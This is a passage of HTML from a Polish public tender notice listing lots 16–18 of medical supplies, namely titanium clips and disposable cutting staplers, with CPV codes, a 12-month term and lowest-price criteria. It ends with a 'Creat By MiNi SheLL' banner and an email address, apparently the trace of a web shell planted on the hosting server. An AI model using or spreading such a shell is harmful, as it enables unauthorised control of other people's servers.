Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.16 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Klipsy tytanowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Klipsy tytanowe do klipsownicy STORZ średnio-duże - 120 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.17 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Staplery zamykająco tnące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Stapler zamykająco tnący z zakrzywioną główką  jednorazowego użytku  o długości linii cięcia 40 mm. - 12 sztuk
2. Magazynek do staplera z zakrzywioną głowicą o długości linii cięcia 40mm. - 6 sztuk
Wymagane parametry przedmiotu zamówienia zostały opisane w załączniku nr 1.18 do SIWZ, który po wypełnieniu należy dołączyć do oferty..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.22.00-5, 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com